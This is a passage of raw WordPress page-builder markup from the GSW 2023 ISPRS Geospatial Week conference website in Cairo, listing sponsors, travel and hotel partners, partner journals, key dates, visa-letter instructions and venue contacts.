125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /><p><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 